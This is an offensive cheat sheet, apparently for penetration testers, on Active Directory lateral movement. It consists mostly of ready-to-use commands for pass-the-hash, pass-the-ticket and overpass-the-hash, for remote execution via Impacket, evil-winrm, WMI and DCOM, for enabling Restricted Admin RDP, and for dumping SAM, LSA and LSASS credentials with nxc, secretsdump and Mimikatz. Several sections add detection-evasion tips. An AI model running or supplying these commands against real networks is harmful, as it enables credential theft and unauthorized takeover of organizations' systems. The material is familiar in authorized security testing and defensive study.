AD Lateral Movement

Pass-the-Hash (PTH)

Use an NT hash in place of a password for authentication over NTLM protocols (SMB, WinRM, RPC).

# nxc — verify PTH works
nxc smb TARGET -u Administrator -H :NTHASH

# evil-winrm (WinRM)
evil-winrm -i TARGET -u Administrator -H NTHASH

# Impacket psexec
psexec.py -hashes :NTHASH 'domain.local/Administrator'@TARGET

# Impacket wmiexec (stealthier — no file upload)
wmiexec.py -hashes :NTHASH 'domain.local/Administrator'@TARGET

# Impacket smbexec (no new service creation)
smbexec.py -hashes :NTHASH 'domain.local/Administrator'@TARGET

# xfreerdp + PTH (Restricted Admin Mode must be enabled on target)
xfreerdp /u:Administrator /pth:NTHASH /d:domain.local /v:TARGET

Pass-the-Ticket (PTT)

Import an existing Kerberos ticket into your session and use Kerberos-enabled tools.

Linux

# Set ticket path
export KRB5CCNAME=/path/to/ticket.ccache

# Use with impacket tools (-k flag skips password/hash)
secretsdump.py -k -no-pass TARGET.domain.local
wmiexec.py -k -no-pass domain.local/user@TARGET
psexec.py -k -no-pass domain.local/user@TARGET

Windows (Rubeus)

# Inject ticket into current logon session
.\Rubeus.exe ptt /ticket:BASE64_TICKET

# Verify
klist

# Use normally (net use, Enter-PSSession, etc.)
dir \\TARGET\C$

Overpass-the-Hash (Pass-the-Key)

Convert an NT hash or AES key into a Kerberos TGT:

# Linux (impacket)
getTGT.py domain.local/user -hashes :NTHASH -dc-ip DC_IP
export KRB5CCNAME=user.ccache
wmiexec.py -k -no-pass domain.local/user@TARGET

# With AES256 key (OPSEC: preferred over NT hash — Kerberos only, no NTLM)
getTGT.py domain.local/user -aesKey AES256KEY -dc-ip DC_IP

# Windows — Rubeus
.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt
.\Rubeus.exe asktgt /user:user /aes256:AES256KEY /ptt

PSExec (Sysinternals / Impacket)

Creates a remote service on the target to execute commands. Noisy — creates Windows event log entries.

# Impacket (Linux)
psexec.py domain.local/Administrator:pass@TARGET
psexec.py -hashes :NTHASH domain.local/Administrator@TARGET

# Sysinternals (Windows)
PsExec.exe \\TARGET -u DOMAIN\Administrator -p pass cmd

# nxc (built-in psexec module)
nxc smb TARGET -u Administrator -p pass -x "whoami" --exec-method smbexec

wmiexec (no file upload, stealthier)

Uses WMI to spawn processes. Output captured via SMB. No file dropped on target.

# Impacket
wmiexec.py domain.local/Administrator:pass@TARGET
wmiexec.py -hashes :NTHASH domain.local/Administrator@TARGET 'whoami /all'

smbexec (no new service, semi-interactive)

Creates a service per command execution (deletes it after), never writes a binary to disk.

smbexec.py domain.local/Administrator:pass@TARGET
smbexec.py -hashes :NTHASH domain.local/Administrator@TARGET

atexec (Task Scheduler-based)

Uses Windows Task Scheduler to run a command once, retrieve output, delete task.

atexec.py domain.local/Administrator:pass@TARGET whoami
atexec.py -hashes :NTHASH domain.local/Administrator@TARGET 'type C:\Users\Administrator\Desktop\root.txt'

evil-winrm (WinRM Interactive Shell)

Best interactive shell for WinRM targets. Supports PTH, Kerberos, SSL, uploads/downloads.

# Password
evil-winrm -i TARGET -u Administrator -p 'Password123'

# Hash
evil-winrm -i TARGET -u Administrator -H NTHASH

# Kerberos
export KRB5CCNAME=admin.ccache
evil-winrm -i TARGET -u Administrator -r domain.local

# Upload / Download
upload local_file.exe C:\\Temp\\file.exe
download C:\\Temp\\output.txt local_output.txt

# Load PowerShell scripts from local directory
evil-winrm -i TARGET -u user -p pass -s /path/to/scripts/
# Then inside session:
Invoke-BloodHound -CollectionMethod All

WMI (wmic + Invoke-WmiMethod)

# Run command via wmic (Windows)
wmic /node:TARGET /user:DOMAIN\Administrator /password:pass process call create "cmd.exe /c whoami > C:\Temp\out.txt"

# PowerShell
$cred = Get-Credential
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe" -ComputerName TARGET -Credential $cred

RDP (Restricted Admin Mode — PTH via xfreerdp)

Restricted Admin Mode allows PTH for RDP but the session runs without network credentials:

# Check if Restricted Admin Mode is enabled (registry)
# HKLM\System\CurrentControlSet\Control\Lsa — DisableRestrictedAdmin = 0

# Connect with hash
xfreerdp /u:Administrator /pth:NTHASH /d:domain.local /v:TARGET /dynamic-resolution

# Enable Restricted Admin Mode remotely (requires admin access)
nxc smb TARGET -u admin -p pass -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f'

DCOM (Distributed Component Object Model)

Use COM objects for remote execution — less common, useful for evading detections on SMB.

# MMC20.Application DCOM lateral movement
$dcom = [System.Activator]::CreateInstance([System.Type]::GetTypeFromProgID('MMC20.Application', 'TARGET'))
$dcom.Document.ActiveView.ExecuteShellCommand('cmd', $null, '/c whoami > C:\Temp\out.txt', '7')

Credential Dumping on Compromised Host

Once you have local admin on a machine:

# Remote dump via nxc
nxc smb TARGET -u admin -p pass --sam   # SAM hashes
nxc smb TARGET -u admin -p pass --lsa   # LSA secrets
nxc smb TARGET -u admin -p pass -M lsassy  # lsassy module (LSASS dump)

# secretsdump.py
secretsdump.py domain.local/Administrator:pass@TARGET

# Mimikatz (on Windows shell)
sekurlsa::logonpasswords    # plaintext + NT hashes from LSASS
sekurlsa::tickets           # Kerberos tickets
lsadump::sam                # local SAM